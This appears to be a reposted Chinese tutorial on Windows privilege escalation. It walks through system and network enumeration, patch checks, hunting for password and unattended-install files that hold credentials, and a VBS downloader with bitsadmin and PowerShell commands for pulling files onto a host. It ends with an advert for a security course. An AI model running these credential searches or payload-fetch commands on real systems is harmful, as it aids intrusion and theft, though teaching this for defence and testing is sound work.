2026/4/18 14:51:13
网站建设
项目流程
做视频网站可以自学吗,中石化建设工程有限公司网站,做网站需要数据储存么,网站做支付系统介绍 这篇文章是介绍window的权限提升#xff0c;虽然不是一个全面的指南#xff0c;但会试图覆盖主要的技术#xff0c;常用的资源列表在文章底部#xff0c;可供大家参考。
window权限提升基础知识 初始信息收集
在开始提权之前,我们需要了解操作系统基本的信息,如安装…介绍这篇文章是介绍window的权限提升虽然不是一个全面的指南但会试图覆盖主要的技术常用的资源列表在文章底部可供大家参考。window权限提升基础知识初始信息收集在开始提权之前,我们需要了解操作系统基本的信息,如安装软件,操作系统版本,连接用户,端口进程等信息,确定操作系统名称和版本1C:\Users\sanr systeminfo | findstr /B /C:”OS Name” /C:”OS Version”查看主机名1C:\Users\sanr hostname查看所有环境变量1C:\Users\sanr SET查看用户跟用户详细信息12C:\Users\sanr net userC:\Users\sanr net user sanr查看在线用户1C:\Users\sanr query user查询终端端口1C:\Users\sanr REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber网络连接让我们来看看该系统的网络设置 – 基本网络路由防火墙等。查看ip dns地址1C:\Users\sanripconfig /all要查看路由表1C:\Users\sanr route print要查看ARP缓存1C:\Users\sanr arp -A查看网络连接1C:\Users\sanr netstat -ano要查看防火墙规则123C:\Users\sanr netstat -anoC:\Users\sanr netsh firewall show configC:\Users\sanr netsh firewall show state应用程序和服务查看系统上的计划任务1C:\Users\sanr schtasks /QUERY /fo LIST /v要查看服务的进程ID1C:\Users\sanr tasklist /SVC要查看已安装驱动程序的列表1C:\Users\sanr DRIVERQUERY查看已经启动Windows 服务1C:\Users\sanr net start查看某服务启动权限123456789101112C:\Users\sanr sc qc mysqla[SC] QueryServiceConfig 成功SERVICE_NAME: mysqlaTYPE : 10 WIN32_OWN_PROCESSSTART_TYPE : 2 AUTO_STARTERROR_CONTROL : 1 NORMALBINARY_PATH_NAME : “D:\Program Files\phpstudy\mysql\bin\mysqld.exe” MySQLaLOAD_ORDER_GROUP :TAG : 0DISPLAY_NAME : MySQLaDEPENDENCIES :SERVICE_START_NAME : LocalSystem利用WMIC获取有价值的数据查看其版本的已安装程序的列表1C:\Users\sanr wmic product list brief查看服务进程或启动程序的列表123C:\Users\sanr wmic service list brief # Lists servicesC:\Users\sanr wmic process list brief # Lists processesC:\Users\sanr wmic startup list brief # Lists startup items检查已安装的更新和安装日期1C:\Users\sanr wmic qfe get Caption,Description,HotFixID,InstalledOn搜索您可以使用提升权限的特定漏洞12C:\Users\sanr wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KBxxxxxxx”# Replace with a patch version that you are searching for. Eg – KB3000061执行上面的命令的没有输出意味着那个补丁未安装。敏感数据和directories检查未加密的密码或敏感信息的文件多汁:12345C:\Users\sanr cd/C:\Users\sanr dir /b/s password.txt # Will search for all password.txt files on the filesystem.C:\Users\sanr dir /b/s config.* # Will search for all files starting with ‘config’ on the filesystem.C:\Users\sanr findstr /si password *.xml *.ini *.txtC:\Users\sanr findstr /si login *.xml *.ini *.txt除此之外您还可以检查无人值守安装日志文件。这些文件通常包含base64编码的密码。你更可能在大型企业中其中单个系统的手动安装是不切实际的找到这些文件。这些文件的共同位置是1234C:\sysprep.infC:\sysprep\sysprep.xmlC:\Windows\Panther\Unattend\Unattended.xmlC:\Windows\Panther\Unattended.xml目录文件操作列出d:\www的所有目录1for /d %i in (d:\www\*) do echo %i把当前路径下文件夹的名字只有1-3个字母的显示出来1for /d %i in (???) do echo %i以当前目录为搜索路径把当前目录与下面的子目录的全部EXE文件列出1for /r %i in (*.exe) do echo %i以指定目录为搜索路径把当前目录与下面的子目录的所有文件列出1for /r “f:\freehost\hmadesign\web\” %i in (*.*) do echo %i显示a.txt里面的内容因为/f的作用会读出a.txt中123456789101112for /f %i in (c:\1.txt) do echo %iRAR 打包C:\Users\sanr rar a -k -r -s -m3 c:\1.rar c:\foldephp读文件C:\Users\sanr c:/php/php.exe “c:/www/admin/1.php”?php$file_handle fopen(“f:/config.asp”, “r”);while (! feof($file_handle)) {echo fgets($file_handle);}fclose($file_handle);?利用系统程序,文件下载拥有了这些信息我们现在可以开始实际提升我们的特权的过程。利用vbs来让我们上传文件,是一个vbs下载者,原理是下载文件到这台计算机(需要访问网络)12345678910111213141516171819202122‘ downloadfile.vbs‘ Set your settingsstrFileURL “http://127.0.0.1/text.ico”strHDLocation “d:\text.ico”‘ Fetch the fileSet objXMLHTTP CreateObject(“MSXML2.XMLHTTP”)objXMLHTTP.open “GET”, strFileURL, falseobjXMLHTTP.send()If objXMLHTTP.Status 200 ThenSet objADOStream CreateObject(“ADODB.Stream”)objADOStream.OpenobjADOStream.Type 1 ‘adTypeBinaryobjADOStream.Write objXMLHTTP.ResponseBodyobjADOStream.Position 0 ‘Set the stream position to the startSet objFSO Createobject(“Scripting.FileSystemObject”)If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocationSet objFSO NothingobjADOStream.SaveToFile strHDLocationobjADOStream.CloseSet objADOStream NothingEnd ifSet objXMLHTTP Nothing这个脚本可以在任何版本的Windows上运行,要执行它,如下。1C:\Users\sanr script.exe downloadfile.vbs如果操作系统是Windows7及以上的,使用的bitsadmin跟powershell12C:\Users\sanr bitsadmin /transfer n http://www.jd.com/favicon.ico d:\text.icoC:\Users\sanr powershell (new-object System.Net.WebClient).DownloadFile(‘http://www.jd.com/favicon.ico’,’text.ico’)下载文件方式还有一些其他的方式,比如ftp php python,可根据自己的需求来选择。转载于:https://www.cnblogs.com/cnhacker/p/7041119.html学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群一、基础适配人群零基础转型者适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链开发/运维人员具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展或者转行就业应届毕业生计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期二、能力提升适配1、技术爱好者适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者2、安全从业者帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力3、合规需求者包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】